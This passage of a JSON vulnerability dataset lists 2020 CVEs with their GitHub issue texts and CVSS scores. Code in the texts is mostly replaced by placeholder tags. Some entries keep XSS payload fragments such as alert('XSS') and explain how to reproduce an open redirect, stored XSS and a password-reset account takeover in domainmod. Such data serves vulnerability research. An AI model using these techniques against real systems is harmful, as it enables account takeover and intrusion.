  47180. "CVE_ID": "CVE-2020-12666",
  47181. "Issue_Url_old": "https://github.com/go-macaron/macaron/issues/198",
  47182. "Issue_Url_new": "https://github.com/go-macaron/macaron/issues/198",
  47183. "Repo_new": "go-macaron/macaron",
  47184. "Issue_Created_At": "2020-04-30T13:58:41Z",
  47185. "description": "vulnerablilitiy NUMBERTAG APITAG URLTAG \u9700\u8981\u5f00\u542f\u9759\u6001\u6587\u4ef6\u670d\u52a1 \u6f0f\u6d1e\u4ee3\u7801 CODETAG \u53ea\u8981\u4f7f\u7528\u4e86 APITAG \u6bd4\u5982\u8bbf\u95ee\uff1a FILETAG \u5373\u53ef\u8df3\u5230evoa.me APITAG \u5206\u6790\u4e00\u4e0b\uff0c\u4ee5 APITAG \u4e3a\u4f8b APITAG APITAG APITAG APITAG PATHTAG \u8fd4\u56de\u5934\u5bf9\u5e94\u7684location\u4e3a APITAG APITAG PATHTAG \u7f16\u7801\u4e3a APITAG APITAG \u4e3e\u4e2a\u4f8b\u5b50 \u6bd4\u5982\u5047\u5982\u7a0b\u5e8f\u91cc\u6709\u8fd9\u4e48\u4e00\u4e2a\u4ee3\u7801 ERRORTAG APITAG APITAG APITAG APITAG APITAG by the way, django\u66fe\u7ecf\u4e5f\u6709\u4e00\u4e2a\u5dee\u4e0d\u591a\u7684\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u770b\u770b\u8fd9\u7bc7\u6587\u7ae0\uff1a URLTAG \u4fee\u590d\u5efa\u8bae\uff1a \u5bf9\u91cd\u5b9a\u5411\u7684url\u8fdb\u884c\u5224\u65ad\uff0c\u4e0d\u5141\u8bb8//\u5f00\u5934 \u7531\u8877\u7684\u611f\u8c22\u60a8\u770b\u5b8c\u8fd9\u4e48\u957f\u4e00\u7bc7issue\u62a5\u544a",
  47186. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  47187. "severity": "MEDIUM",
  47188. "baseScore": 6.1,
  47189. "impactScore": 2.7,
  47190. "exploitabilityScore": 2.8
  47191. },
  47192. {
  47193. "CVE_ID": "CVE-2020-12706",
  47194. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2306",
  47195. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2306",
  47196. "Repo_new": "php-fusion/PHP-Fusion",
  47197. "Issue_Created_At": "2020-04-09T07:56:22Z",
  47198. "description": "Multi Cross site scripting (XSS) vulnerabilities php fusion NUMBERTAG Describe the bug Cross site scripting (XSS) vulnerabilities in PHP Fusion NUMBERTAG allow remote attackers to inject arbitrary web script or HTML To Reproduce Steps to reproduce the behavior NUMBERTAG Login as member NUMBERTAG Go to 'Q&A or shoutbo NUMBERTAG Submit malicious content NUMBERTAG Login as admin and view Q&A or shout content NUMBERTAG SS trigger Expected behavior When admin view content, a pop up will be displayed Screenshots FILETAG Desktop (please complete the following information): OS: Windows NUMBERTAG Browser: Firefox or Chrome Version: Smartphone (please complete the following information): Device: [e.g. APITAG OS: [e.g. iOS NUMBERTAG Browser [e.g. stock browser, safari] Version [e.g NUMBERTAG Additional context POC at: URLTAG",
  47199. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47200. "severity": "MEDIUM",
  47201. "baseScore": 5.4,
  47202. "impactScore": 2.7,
  47203. "exploitabilityScore": 2.3
  47204. },
  47205. {
  47206. "CVE_ID": "CVE-2020-12708",
  47207. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2310",
  47208. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2310",
  47209. "Repo_new": "php-fusion/PHP-Fusion",
  47210. "Issue_Created_At": "2020-04-30T08:09:05Z",
  47211. "description": "Reflected XSS on FILETAG and FILETAG . Describe the bug Reflected cross site scripting (XSS) vulnerabilities in PHP Fusion NUMBERTAG allow remote attackers to inject arbitrary web script or HTML via FILETAG and FILETAG To Reproduce User authenticated or unauthenticated click to link bellow and script will be executed: URLTAG APITAG >alert('XSS') APITAG URLTAG APITAG >alert('XSS') APITAG Tested on OS: Windows NUMBERTAG Browser: Firefox and Chrome Please check it! Thanks",
  47212. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  47213. "severity": "MEDIUM",
  47214. "baseScore": 6.1,
  47215. "impactScore": 2.7,
  47216. "exploitabilityScore": 2.8
  47217. },
  47218. {
  47219. "CVE_ID": "CVE-2020-12718",
  47220. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2309",
  47221. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2309",
  47222. "Repo_new": "php-fusion/PHP-Fusion",
  47223. "Issue_Created_At": "2020-04-29T01:38:25Z",
  47224. "description": "Cross Site Scripting Vulnerability on \"preview comment\" feature in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a stored XSS vulnerability in the \"preview comment\" feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Log into the panel. Go to PATHTAG Click edit on comment Insert payload '> APITAG View the preview to trigger XSS. View the preview to get in request and such Store XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version of Browser NUMBERTAG",
  47225. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47226. "severity": "MEDIUM",
  47227. "baseScore": 5.4,
  47228. "impactScore": 2.7,
  47229. "exploitabilityScore": 2.3
  47230. },
  47231. {
  47232. "CVE_ID": "CVE-2020-12725",
  47233. "Issue_Url_old": "https://github.com/getredash/redash/issues/4869",
  47234. "Issue_Url_new": "https://github.com/getredash/redash/issues/4869",
  47235. "Repo_new": "getredash/redash",
  47236. "Issue_Created_At": "2020-05-07T10:53:13Z",
  47237. "description": "Vulnerability report: details TBA. Havoc Research has discovered a vulnerability in Redash and reported it to security APITAG This issue will be populated with details once the vendor has addressed it, or in NUMBERTAG days, whichever comes first. CVE number has been requested. Suggested CVSS NUMBERTAG ector: URLTAG NUMBERTAG Internal reference: HA NUMBERTAG C NUMBERTAG Thanks \ud83c\udf2a\ufe0f Havoc Research team",
  47238. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  47239. "severity": "HIGH",
  47240. "baseScore": 7.2,
  47241. "impactScore": 5.9,
  47242. "exploitabilityScore": 1.2
  47243. },
  47244. {
  47245. "CVE_ID": "CVE-2020-12735",
  47246. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/122",
  47247. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/122",
  47248. "Repo_new": "domainmod/domainmod",
  47249. "Issue_Created_At": "2020-05-02T05:10:09Z",
  47250. "description": "Authentication Bypass via FILETAG . Summary : FILETAG handles \u201cresetting\u201d/changing an existing user\u2019s password. The reset functionality uses PHP\u2019s APITAG to derive the new password for the user that is attempting to change their password. This method of using APITAG to create a temporary password is very deterministic and allows an attacker to invoke the reset password functionality and reliably determine what the new password is, thus allowing for an account takeover. File Affected : FILETAG Vulnerability Details NUMBERTAG Below is an overview of the logic used by FILETAG to change a user\u2019s password. FILETAG NUMBERTAG In red is the SQL statement is used to determine the existence of a user. APITAG APITAG APITAG APITAG APITAG A user\u2019s password is changed only if the above statement returns a non empty result set. As we can see, the above SQL statement results in a row being returned if either the username or the email address exists in the database. Hence, an attacker will able to invoke a change of password (in green) as long the attacker knows a valid username NUMBERTAG Once, the user\u2019s username (email ID) is validated, the application proceeds to change the password of the user (in green). A new/temporary password is created for the user by using the first NUMBERTAG characters of the MD5 hash of the current Unix timestamp. APITAG APITAG APITAG APITAG APITAG An SQL statement is then used to update the user with the new password NUMBERTAG The problem with the aforementioned logic is that It is very easy for an attacker to determine the new password as the result of the APITAG is very deterministic and not random. Hence, this vulnerability can be exploited to change the password of a user and then reliably determine the new password. The credentials can then be used to login to the application. APITAG APITAG As, admin is a default user on the application, this vulnerability can be used to change the admin password and consequently login to the application as the said admin user. Exploit: The following python script can be used to reset/change a user\u2019s password and subsequently determine the new password. CODETAG NUMBERTAG Successful login using APITAG FILETAG NUMBERTAG Resetting the password using the above exploit code NUMBERTAG Unsuccessful login using APITAG FILETAG NUMBERTAG Successful login using newly obtained credentials admin:e NUMBERTAG edd7b FILETAG Mitigation: One suggestion is to use a cryptographically secure random number as the seed to the APITAG instead of APITAG APITAG",
  47251. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47252. "severity": "CRITICAL",
  47253. "baseScore": 9.8,
  47254. "impactScore": 5.9,
  47255. "exploitabilityScore": 3.9
  47256. },
  47257. {
  47258. "CVE_ID": "CVE-2020-12740",
  47259. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/576",
  47260. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/576",
  47261. "Repo_new": "appneta/tcpreplay",
  47262. "Issue_Created_At": "2020-05-08T15:35:39Z",
  47263. "description": "Heap overflow in APITAG Describe the bug A heap based buffer overflow was discovered in tcprewrite binary, during the get_c operation. The issue is being triggered in the function APITAG at common/get.c. To Reproduce Steps to reproduce the behavior NUMBERTAG Compile tcpreplay according to the default configuration NUMBERTAG execute command APITAG poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious pcap that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG Debug ERRORTAG System (please complete the following information): OS version : Ubuntu NUMBERTAG Tcpreplay Version NUMBERTAG master branch",
  47264. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47265. "severity": "CRITICAL",
  47266. "baseScore": 9.1,
  47267. "impactScore": 5.2,
  47268. "exploitabilityScore": 3.9
  47269. },
  47270. {
  47271. "CVE_ID": "CVE-2020-12762",
  47272. "Issue_Url_old": "https://github.com/rsyslog/libfastjson/issues/161",
  47273. "Issue_Url_new": "https://github.com/rsyslog/libfastjson/issues/161",
  47274. "Repo_new": "rsyslog/libfastjson",
  47275. "Issue_Created_At": "2020-05-15T14:09:18Z",
  47276. "description": "Please check if affected by CVETAG . CVETAG was reported for json c, see URLTAG Please check if libfastjson is affected by a similar problem. At least it looks like that printbuf.c changes should be backported.",
  47277. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  47278. "severity": "HIGH",
  47279. "baseScore": 7.8,
  47280. "impactScore": 5.9,
  47281. "exploitabilityScore": 1.8
  47282. },
  47283. {
  47284. "CVE_ID": "CVE-2020-12767",
  47285. "Issue_Url_old": "https://github.com/libexif/libexif/issues/31",
  47286. "Issue_Url_new": "https://github.com/libexif/libexif/issues/31",
  47287. "Repo_new": "libexif/libexif",
  47288. "Issue_Created_At": "2020-02-18T01:59:09Z",
  47289. "description": "division by zero in libexif/exif entry.c. The problem of dividing by zero was found during the OSS Fuzz project test. Project: libexif Fuzzer: APITAG Fuzz target binary: exif_loader_fuzzer Platform Id: linux Type of test\uff1aundefined Command: python infra/helper.py build_fuzzers sanitizer undefined libexif Results of execution\uff1a ERRORTAG",
  47290. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  47291. "severity": "MEDIUM",
  47292. "baseScore": 5.5,
  47293. "impactScore": 3.6,
  47294. "exploitabilityScore": 1.8
  47295. },
  47296. {
  47297. "CVE_ID": "CVE-2020-12797",
  47298. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5606",
  47299. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5606",
  47300. "Repo_new": "hashicorp/consul",
  47301. "Issue_Created_At": "2019-04-04T14:35:02Z",
  47302. "description": "ACL is not updated on remote datacenters. Overview of the Issue After updating an acl on primary site, we've noticed that changes are not replicated to remote datacenters (even few after NUMBERTAG h). In this example, we've changed the policy to allow write in kv on path \"services data overrides\". Note: This does not apply to all ACLs. Changes on other ACLs are replicated, new ACLs are replicated. Here is the detail of this acl: Updated ACL: dc1 (ACL datacenter): CODETAG Other datacenters: dc2: CODETAG dc3: ERRORTAG Writing kv in path not replicated: dc1 (acl site) CODETAG others: ERRORTAG Reproduction Steps I don't think it is simple to reproduce as it only impact some ACL (undefined root cause). Consul info for both Client and Server APITAG APITAG ACL Datacenter Server info APITAG ERRORTAG APITAG APITAG APITAG datacenter Server info APITAG ERRORTAG APITAG Operating system and Environment details OS: APITAG Linux release NUMBERTAG APITAG APITAG APITAG Versions APITAG CODETAG APITAG Log Fragments There is no log related to ACL except this mention at startup: APITAG Questions How come dc3 is still in legacy mode? Any idea why we are unable to propagate changes on this acl?",
  47303. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  47304. "severity": "MEDIUM",
  47305. "baseScore": 5.3,
  47306. "impactScore": 1.4,
  47307. "exploitabilityScore": 3.9
  47308. },
  47309. {
  47310. "CVE_ID": "CVE-2020-12845",
  47311. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1242",
  47312. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1242",
  47313. "Repo_new": "cherokee/webserver",
  47314. "Issue_Created_At": "2020-07-25T11:07:45Z",
  47315. "description": "NULL pointer derefence during HTTP authentication. Cherokee Web Server NUMBERTAG to NUMBERTAG have a NULL pointer dereference which leads to a denial of service. Any server that has HTTP authentication (either basic or digest) enabled and paths that respond with the WWW Authenticate header, can be crashed by an unauthenticated and remote attacker by sending a malformed Authorization header to such paths. The following commands are used to generate HTTP requests that trigger the vulnerability APITAG APITAG does not allocate memory if the the size of the input string is less or equal to zero and return APITAG nonetheless. ERRORTAG APITAG and APITAG do not have any checks on the return value from APITAG and will later dereference an uninitialized pointer (read and write), at APITAG CODETAG and in a call to APITAG (illegal write at APITAG ) respectively CODETAG",
  47316. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47317. "severity": "HIGH",
  47318. "baseScore": 7.5,
  47319. "impactScore": 3.6,
  47320. "exploitabilityScore": 3.9
  47321. },
  47322. {
  47323. "CVE_ID": "CVE-2020-12872",
  47324. "Issue_Url_old": "https://github.com/erlyaws/yaws/issues/402",
  47325. "Issue_Url_new": "https://github.com/erlyaws/yaws/issues/402",
  47326. "Repo_new": "erlyaws/yaws",
  47327. "Issue_Created_At": "2020-05-24T13:03:23Z",
  47328. "description": "CVETAG . While going trough some CVE feeds and track the information noticed the CVE NUMBERTAG CVETAG assignment for yaws, which is from the following report URLTAG Were you informed about this?",
  47329. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  47330. "severity": "MEDIUM",
  47331. "baseScore": 5.5,
  47332. "impactScore": 3.6,
  47333. "exploitabilityScore": 1.8
  47334. },
  47335. {
  47336. "CVE_ID": "CVE-2020-12882",
  47337. "Issue_Url_old": "https://github.com/Submitty/Submitty/issues/5266",
  47338. "Issue_Url_new": "https://github.com/submitty/submitty/issues/5266",
  47339. "Repo_new": "submitty/submitty",
  47340. "Issue_Created_At": "2020-04-19T19:46:42Z",
  47341. "description": "Security bug] Stored XSS Trigger for TA by user account. Describe the bug APITAG vulnerability can potentially enable any student to takeover the account of TA if they open the attachment as the cookie gets exposed._ A student logged in via username/password student:student has the ability to submit submissions for grading. This can be then viewed by TA from their account via ta:ta . When they click on the file for grading, stored xss gets triggered. Expected behavior .svg files must be stopped from getting uploaded by any student during submissions. To Reproduce Steps to reproduce the behavior NUMBERTAG As student login, via student:student NUMBERTAG Go here URLTAG (as e NUMBERTAG In the new submission upload the .svg file. The svg file can be created by saving as .svg Github doesn't allow attacing svg and neither its code so here is the [link URLTAG to create a sample malicious svg file NUMBERTAG Login as ta and open the same for grading. The XSS gets triggered alerting the cookies. Screenshots APITAG APITAG Additional context We may try to block .svg files from uploading and also try to drop the Content Type: image/svg+xml. Adding content disposition: attachment as mentioned here URLTAG may help for the mitigation.",
  47342. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47343. "severity": "MEDIUM",
  47344. "baseScore": 5.4,
  47345. "impactScore": 2.7,
  47346. "exploitabilityScore": 2.3
  47347. },
  47348. {
  47349. "CVE_ID": "CVE-2020-12883",
  47350. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12925",
  47351. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12925",
  47352. "Repo_new": "armmbed/mbed-os",
  47353. "Issue_Created_At": "2020-05-05T20:59:22Z",
  47354. "description": "Out of range memory access in APITAG APITAG library parser. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with option delta lower than NUMBERTAG is parsed, the remaning message length is incorrectly calculated in the line: URLTAG The packet data pointer is not incremented prior to the remaining message length calculation and therefore it does not account for the option byte. This allows a malformed message with not option value following to pass through message length check in the line: URLTAG For short options length the remaining message length is unchanged after option lengh processing: URLTAG Allowing to pass throught final message length check: URLTAG In option processing code the packet data pointer is incremented beyond the input buffer boundary and passed for further processing, e.g. in: URLTAG The invalid pointer is then accessed by functions called from option processing code, e.g. in: URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG",
  47355. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47356. "severity": "CRITICAL",
  47357. "baseScore": 9.1,
  47358. "impactScore": 5.2,
  47359. "exploitabilityScore": 3.9
  47360. },
  47361. {
  47362. "CVE_ID": "CVE-2020-12883",
  47363. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12927",
  47364. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12927",
  47365. "Repo_new": "armmbed/mbed-os",
  47366. "Issue_Created_At": "2020-05-05T21:04:21Z",
  47367. "description": "Out of range memory access in APITAG APITAG library parser option value length. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with option length equal to NUMBERTAG or NUMBERTAG is set with no extended option length following, access beyond the provided packet buffer is made due to insufficient message length checks: URLTAG Before option length processing the message left bytes is calculated including the option delta/option length byte: URLTAG In case of option length set to NUMBERTAG the extended delta length is accessed in the following line without prior check for buffer out of bound condition: URLTAG In case of option length set to NUMBERTAG the extended length bytes are accessed with insufficient out of boudnds condition checks. As the message_left variable includes the option length byte, the check will pass malformed frame if there is only one extended length byte following: URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG FILETAG",
  47368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47369. "severity": "CRITICAL",
  47370. "baseScore": 9.1,
  47371. "impactScore": 5.2,
  47372. "exploitabilityScore": 3.9
  47373. },
  47374. {
  47375. "CVE_ID": "CVE-2020-12883",
  47376. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12926",
  47377. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12926",
  47378. "Repo_new": "armmbed/mbed-os",
  47379. "Issue_Created_At": "2020-05-05T21:02:26Z",
  47380. "description": "Out of range memory access in APITAG APITAG library parser option number. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with option delta equal to NUMBERTAG or NUMBERTAG is parsed with no extended option delta following, access beyond the packet data buffer is made due to insufficient message length checks: URLTAG Before option number processing the message left bytes is calculated including the option delta/option length byte: URLTAG In case of option delta set to NUMBERTAG the extended delta byte is accessed in the following line without prior check for buffer out of bound index: URLTAG In case of option delta set to NUMBERTAG the extended delta bytes are accessed with insufficient index check. As the message_left variable includes the option delta byte, the check will pass malformed frame if there is only one extended delta byte following: URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG FILETAG",
  47381. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47382. "severity": "CRITICAL",
  47383. "baseScore": 9.1,
  47384. "impactScore": 5.2,
  47385. "exploitabilityScore": 3.9
  47386. },
  47387. {
  47388. "CVE_ID": "CVE-2020-12884",
  47389. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12928",
  47390. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12928",
  47391. "Repo_new": "armmbed/mbed-os",
  47392. "Issue_Created_At": "2020-05-05T21:05:47Z",
  47393. "description": "Out of range memory access in APITAG APITAG library parser APITAG Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with malformed URI Query option is provided as input, the parser reads out of the provided input packet memory area. URLTAG The packet_data_pptr is accessed after being incremented by option_len without prior out of bound memory check. The temp_parsed_uri_query_ptr is validated for correct range, but the range valid for temp_parsed_uri_query_ptr is derived from the amount of allocated heap memory, not the input size. Therefore the check of temp_parsed_uri_query_ptr may be insufficient for safe access to the area pointed by packet_data_pptr. URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG",
  47394. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47395. "severity": "CRITICAL",
  47396. "baseScore": 9.1,
  47397. "impactScore": 5.2,
  47398. "exploitabilityScore": 3.9
  47399. },
  47400. {
  47401. "CVE_ID": "CVE-2020-12885",
  47402. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12929",
  47403. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12929",
  47404. "Repo_new": "armmbed/mbed-os",
  47405. "Issue_Created_At": "2020-05-05T21:08:59Z",
  47406. "description": "Infinite loop in APITAG APITAG library parser. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with an option processed by APITAG function and declared zero option length is encountered, the parser enters an infinite loop. Example entry point with zero length option_len: URLTAG Together with message_left equal to NUMBERTAG this results in zero length needed heap calculation result: URLTAG With zero length heap allocation the function exits early without entering the main processing loop: URLTAG Which leaves ( packet_data_pptr) unmodified, pointing at the same option which leads to APITAG looping over the same option in an infinite loop. Type: Remote Denial Of Service Excessive resources usage (CPU time) System overload Result: The procedure loops infinitely Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG FILETAG",
  47407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47408. "severity": "HIGH",
  47409. "baseScore": 7.5,
  47410. "impactScore": 3.6,
  47411. "exploitabilityScore": 3.9
  47412. },
  47413. {
  47414. "CVE_ID": "CVE-2020-12886",
  47415. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12948",
  47416. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12948",
  47417. "Repo_new": "armmbed/mbed-os",
  47418. "Issue_Created_At": "2020-05-08T18:10:34Z",
  47419. "description": "Out of range memory access in APITAG APITAG library parser token length not validated. Description of defect References: URLTAG FILETAG File: FILETAG Analysis: If a packet with declared token length larger than actually provided is parsed, read out of the provided input buffer boundaries may occur. Invalid memory access may occur in APITAG as there is no check to verify if the arguments are within input buffer boundaries: URLTAG Type: Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Patch proposal: URLTAG Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG",
  47420. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47421. "severity": "CRITICAL",
  47422. "baseScore": 9.1,
  47423. "impactScore": 5.2,
  47424. "exploitabilityScore": 3.9
  47425. },
  47426. {
  47427. "CVE_ID": "CVE-2020-12887",
  47428. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12957",
  47429. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12957",
  47430. "Repo_new": "armmbed/mbed-os",
  47431. "Issue_Created_At": "2020-05-11T21:04:23Z",
  47432. "description": "Memory leak in APITAG APITAG library parser APITAG Description of defect References: URLTAG FILETAG File: FILETAG Example Trace NUMBERTAG Byte leak): ERRORTAG Example Trace (double NUMBERTAG Byte leak): ERRORTAG Analysis: If a packet with multiple options with the same effective option number, but with non zero delta is processed it may lead to memory leak. This issue is related to: URLTAG The parser assumes in APITAG that options with the same number can occur only adjacent to each other using zero delta after the first option with a given number. This is not true due to integer overflow in option number addition which makes it possible to craft a packet with multiple options resulting in the same option number in arbitrary order. In conjunction with lack of verification of pointers to allocated memory before rewriting the pointer with newly allocated space it may lead to memory leak due to memory buffer orphaning. Integer overflow is described in detail in: URLTAG uint NUMBERTAG ariable overflow can happen at: URLTAG and URLTAG If more than one occurence of option with the same number is encountered by APITAG the APITAG may allocate new memory buffer and overwrite pointer pointing to previously allocated memory space in: URLTAG or URLTAG or URLTAG or URLTAG As a result the previously allocated buffer is orphaned and never freed. Patch proposal: URLTAG Type: Integer Overflow or Wraparound Memory leak / heap exhaustion Result: Excessive memory usage Possible crash due to lack of resources Denial of Service Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. ERRORTAG FILETAG FILETAG FILETAG",
  47433. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47434. "severity": "HIGH",
  47435. "baseScore": 7.5,
  47436. "impactScore": 3.6,
  47437. "exploitabilityScore": 3.9
  47438. },
  47439. {
  47440. "CVE_ID": "CVE-2020-12887",
  47441. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12930",
  47442. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12930",
  47443. "Repo_new": "armmbed/mbed-os",
  47444. "Issue_Created_At": "2020-05-05T21:10:48Z",
  47445. "description": "Integer overflow in APITAG APITAG library parser. Description of defect References: URLTAG FILETAG File: FILETAG Analysis: Unhandled option length variable roll over occurs if extended option length encoding is used with NUMBERTAG length encoded. The frame is further processed with the result of integer roll over. URLTAG Type: Integer Overflow or Wraparound Result: Undetected malformed frame Incorrect packet parsing Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? N/A",
  47446. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47447. "severity": "HIGH",
  47448. "baseScore": 7.5,
  47449. "impactScore": 3.6,
  47450. "exploitabilityScore": 3.9
  47451. },
  47452. {
  47453. "CVE_ID": "CVE-2020-13118",
  47454. "Issue_Url_old": "https://github.com/adeoluwa-adebiyi/Mikrotik-Router-Monitoring-System/issues/4",
  47455. "Issue_Url_new": "https://github.com/adeoluwa-adebiyi/mikrotik-router-monitoring-system/issues/4",
  47456. "Repo_new": "adeoluwa-adebiyi/mikrotik-router-monitoring-system",
  47457. "Issue_Created_At": "2020-05-16T17:52:00Z",
  47458. "description": "Security issue: SQL injection. Vulnerability type: SQL injection vulnerability code: in file ERRORTAG : ERRORTAG Parameter $community exists in sql injection. poc: ERRORTAG FILETAG",
  47459. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47460. "severity": "CRITICAL",
  47461. "baseScore": 9.8,
  47462. "impactScore": 5.9,
  47463. "exploitabilityScore": 3.9
  47464. },
  47465. {
  47466. "CVE_ID": "CVE-2020-13121",
